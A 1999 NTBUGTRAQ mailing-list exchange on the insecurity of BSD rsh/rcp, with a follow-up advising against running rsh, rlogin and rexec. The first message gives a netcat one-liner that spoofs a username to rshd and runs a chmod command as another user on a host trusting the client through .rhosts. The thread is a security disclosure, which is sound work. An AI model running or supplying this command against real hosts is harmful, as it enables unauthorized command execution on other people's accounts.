Date: Thu, 8 Apr 1999 19:11:54 -0700 From: Eric Gisin To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: rsh/rcp is not secure This is really a UNIX rshd bug, but it affects users of the NT clients. It's old news that the BSD rsh/rcp services are not secure, however rshd is still is enabled in many UNIX systems. There are rsh/rcp clients in Windows NT, and people are not aware of the ease of defeating security in this environment. The security of this service is based on privileged ports, which are not widely implemented. The NT versions of rcp/rsh have no special privileges like the UNIX versions. Anyone can modify the source or use netcat to fake the client username. For example, D:> nc -v unixhost 514 -p 666 ^@newbie^@newbie^@chmod a= .^@ This will execute the chmod command under newbie's account, if he permits access from that client machine in .rhosts. Basically the problem is since Windows NT includes rsh/rcp, people assume it's as secure as the UNIX counterpart, which is not the case. -------------------------------------------------------------------------- Date: Fri, 9 Apr 1999 09:28:04 -0700 From: David LeBlanc To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: rsh/rcp is not secure At 07:11 PM 4/8/99 -0700, Eric Gisin wrote: >Basically the problem is since Windows NT includes rsh/rcp, people assume >it's as secure as the UNIX counterpart, which is not the case. The UNIX counterpart isn't really all that secure in any case - it assumes that no one on the network can be root, and so come from a low port. Something else to think about is that running a rshd on NT isn't usually a good idea - several implementations run everything as LocalSystem, and the ones that don't store live user passwords. These utilities are full of other security holes - look at the checks in the various scanning products for some examples. Safest thing is just not to run rsh, rlogin and rexec. David LeBlanc dleblanc@mindspring.com